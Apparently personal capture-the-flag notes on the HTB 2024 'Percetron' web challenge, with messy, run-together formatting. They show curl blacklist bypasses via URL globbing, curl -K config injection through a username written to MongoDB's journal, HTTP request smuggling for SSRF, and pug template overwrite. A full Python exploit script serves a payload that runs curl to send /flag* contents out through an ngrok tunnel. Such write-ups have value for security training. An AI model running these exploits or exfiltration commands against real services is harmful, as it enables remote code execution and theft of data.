for _, pair := range params {
paramsMap[pair[0]] = pair[1]
}
jsonData, err := json.Marshal(paramsMap)
if err != nil {
return fmt.Errorf("marshal params failed: %v", err)
}
resp, err := http.Post(healthcheckURL, "application/json", bytes.NewReader(jsonData))
if err != nil {
return fmt.Errorf("http request failed: %v", err)
}
defer resp.Body.Close()
we can use like {} below to bypass blacklist
subprocess.check_output(['curl','{h}ttps://google.com'])
subprocess.check_output(['curl','http[a-z:1]://google.com'])
curl -K ssrf?
in curl we can use -k option without any space to specify a curl config file
example in htbctf 2024 challenge percetron https://trixterthetux.notion.site/HTB-Cyber-Apocalypse-2024-web-Percetron-07e517143f9f4753941efc24b72640e1
curl config will ignore an giberish in start or end of a config file, ex you can see in writeup above
This means we can either hope that the random data before and after isn’t causing any issues, or we can make our username look something like this with the help of newlines in the username:
[random data we don't control]
next
url = "http://z77edtgff23vo0edvqsair2v0m6du4it.oastify.com"
output = "/tmp/trixter_was_here"
next
[random data we don't control]
![[Pasted image 20240315084518.png]] In this case we can use writelog of mongodb to get remote code execution via arbitary file write in pug template
from urllib.parse import urlparse
from flask import Flask, request
import httpx
from pwn import *from pyngrok import ngrok
URL = "http://83.136.252.114:50384"PORT = 4444TUNNEL = ngrok.connect(PORT, "http").public_url
print(TUNNEL)
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
def panel_register(self, password, username):
return self.c.post("/panel/register", data={
"username": username,
"password": password,
})
def panel_login(self, username, password):
return self.c.post("/panel/login", data={
"password": password,
"username": username,
})
def panel_search(self, searchTerm, field):
return self.c.post("/panel/search", data={
"field": field,
"searchTerm": searchTerm,
})
def healthcheck(self, url):
return self.c.get("/healthcheck", params=dict(url=url))
def get_panel_log(self):
return self.c.get("/panel/login")
class API(BaseAPI):
def dev_healthcheck(self, url):
session = self.c.cookies.get('connect.sid')
print("session:", session)
raw_request = f"""GET /test HTTP/1.0Host: localhost:1337Connection: keep-alive:xContent-Length: 1000GET /healthcheck-dev?url={url} HTTP/1.1Host: localhost:1337Cookie: connect.sid={session}Connection: keep-aliveContent-Length: 0""".replace("\n", "\r\n").encode() + b"\r\n"*400 time.sleep(2)
x = urlparse(URL)
r = remote(x.hostname, x.port)
r.send(raw_request)
print(r.recvall())
r.close()
def webServer(port, api: API):
app = Flask(__name__)
@app.get("/")
def home():
return f"""- import('child_process').then(process => process.execSync('curl -d "$(cat /flag*)" {TUNNEL}'))""" @app.post("/")
def p():
print(request.form)
return Thread(target=app.run, args=('0.0.0.0', port))
randstr = lambda x: ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(x))
if __name__ == "__main__":
api = API()
server = webServer(PORT, api)
server.start()
username = f"""nexturl = "{TUNNEL}"output = "/app/views/login.pug"next"""+randstr(6)
password = randstr(32)
res = api.panel_register(username=username, password=password)
print(res.text)
res = api.panel_login(username=username, password=password)
print(res.text)
time.sleep(2) # wait for the journal file to have our username api.dev_healthcheck("-K/tmp/mongodb/journal/WiredTigerLog.0000000001")